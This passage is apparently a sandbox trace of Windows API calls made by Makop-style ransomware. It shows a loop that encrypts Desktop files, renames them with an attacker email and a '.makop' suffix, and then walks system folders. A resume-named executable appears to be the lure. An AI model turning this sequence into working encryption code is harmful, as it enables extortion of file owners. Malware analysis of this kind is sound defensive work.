phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.581] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.581] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.582] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xf98, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xf98, lpOverlapped=0x0) returned 1 [0128.582] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xfa0, dwBufLen=0xfa0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xfa0) returned 1 [0128.591] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.592] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xfa0, lpOverlapped=0x0) returned 1 [0128.592] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.592] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1074, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.592] SetEndOfFile (hFile=0xac) returned 1 [0128.595] GetProcessHeap () returned 0x550000 [0128.595] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.595] GetProcessHeap () returned 0x550000 [0128.595] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.595] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zobaBSN5U.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zobabsn5u.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zobaBSN5U.m4a.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zobabsn5u.m4a.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.601] CloseHandle (hObject=0xac) returned 1 [0128.601] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc4dff50, ftCreationTime.dwHighDateTime=0x1d5e14c, ftLastAccessTime.dwLowDateTime=0x6c069b60, ftLastAccessTime.dwHighDateTime=0x1d5e160, ftLastWriteTime.dwLowDateTime=0x6c069b60, ftLastWriteTime.dwHighDateTime=0x1d5e160, nFileSizeHigh=0x0, nFileSizeLow=0x15c97, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ZxcTm5Lvz9.png", cAlternateFileName="ZXCTM5~1.PNG")) returned 1 [0128.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxcTm5Lvz9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxctm5lvz9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.602] GetProcessHeap () returned 0x550000 [0128.602] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.602] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.602] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.602] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x9, lpOverlapped=0x0) returned 1 [0128.603] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.603] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.603] GetProcessHeap () returned 0x550000 [0128.603] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.603] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.603] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.603] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.603] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.603] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.604] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.604] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.604] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.604] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.604] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.604] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.604] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x15c97, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x15c97, lpOverlapped=0x0) returned 1 [0128.605] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x15ca0, dwBufLen=0x15ca0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x15ca0) returned 1 [0128.606] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.606] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x15ca0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x15ca0, lpOverlapped=0x0) returned 1 [0128.606] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.606] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x15d74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.607] SetEndOfFile (hFile=0xac) returned 1 [0128.610] GetProcessHeap () returned 0x550000 [0128.610] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.610] GetProcessHeap () returned 0x550000 [0128.610] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.610] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxcTm5Lvz9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxctm5lvz9.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxcTm5Lvz9.png.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxctm5lvz9.png.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.615] CloseHandle (hObject=0xac) returned 1 [0128.615] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e5b700, ftCreationTime.dwHighDateTime=0x1d63e6c, ftLastAccessTime.dwLowDateTime=0xd67e4d80, ftLastAccessTime.dwHighDateTime=0x1d63e6c, ftLastWriteTime.dwLowDateTime=0x1c81e400, ftLastWriteTime.dwHighDateTime=0x1d63e62, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0xffff, cFileName="이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe", cAlternateFileName="(20200~1.EXE")) returned 1 [0128.615] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e5b700, ftCreationTime.dwHighDateTime=0x1d63e6c, ftLastAccessTime.dwLowDateTime=0xd67e4d80, ftLastAccessTime.dwHighDateTime=0x1d63e6c, ftLastWriteTime.dwLowDateTime=0x1c81e400, ftLastWriteTime.dwHighDateTime=0x1d63e62, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0xffff, cFileName="이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe", cAlternateFileName="(20200~1.EXE")) returned 0 [0128.615] FindClose (in: hFindFile=0x5699c8 | out: hFindFile=0x5699c8) returned 1 [0128.615] GetProcessHeap () returned 0x550000 [0128.615] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x590b10 | out: hHeap=0x550000) returned 1 Thread: id = 143 os_tid = 0x120 [0128.621] GetProcessHeap () returned 0x550000 [0128.622] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x568d58 [0128.622] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5699c8 [0128.622] GetProcessHeap () returned 0x550000 [0128.622] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d58 | out: hHeap=0x550000) returned 1 [0128.622] GetProcessHeap () returned 0x550000 [0128.622] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x218) returned 0x58fb08 [0128.622] GetProcessHeap () returned 0x550000 [0128.622] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0128.622] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x56c9b0 [0128.622] GetProcessHeap () returned 0x550000 [0128.622] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0128.622] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0128.622] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0128.623] GetProcessHeap () returned 0x550000 [0128.623] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x232) returned 0x590d30 [0128.623] GetProcessHeap () returned 0x550000 [0128.623] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8e) returned 0x56c7f0 [0128.623] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x56c888 [0128.623] GetProcessHeap () returned 0x550000 [0128.623] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56c7f0 | out: hHeap=0x550000) returned 1 [0128.623] FindNextFileW (in: hFindFile=0x56c888, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0128.623] FindNextFileW (in: hFindFile=0x56c888, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0128.623] GetProcessHeap () returned 0x550000 [0128.623] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x290) returned 0x591f78 [0128.623] FindNextFileW (in: hFindFile=0x56c888, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0128.623] FindClose (in: hFindFile=0x56c888 | out: hFindFile=0x56c888) returned 1 [0128.624] GetProcessHeap () returned 0x550000 [0128.624] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x591f78 | out: hHeap=0x550000) returned 1 [0128.624] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0128.624] FindClose (in: hFindFile=0x56c9b0 | out: hFindFile=0x56c9b0) returned 1 [0128.624] GetProcessHeap () returned 0x550000 [0128.624] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x590d30 | out: hHeap=0x550000) returned 1 [0128.624] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Boot", cAlternateFileName="")) returned 1 [0128.624] GetProcessHeap () returned 0x550000 [0128.624] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x568350 [0128.624] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x56c9b0 [0128.624] GetProcessHeap () returned 0x550000 [0128.624] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568350 | out: hHeap=0x550000) returned 1 [0128.624] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0128.624] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0128.624] GetProcessHeap () returned 0x550000 [0128.624] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x222) returned 0x591d38 [0128.625] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.625] GetLastError () returned 0x20 [0128.625] GetProcessHeap () returned 0x550000 [0128.625] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100000) returned 0x2460020 [0128.626] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x2460020, Length=0x100000, ResultLength=0x0 | out: SystemInformation=0x2460020, ResultLength=0x0) returned 0x0 [0128.678] GetCurrentProcessId () returned 0xa30 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.678] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.679] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.680] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.681] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 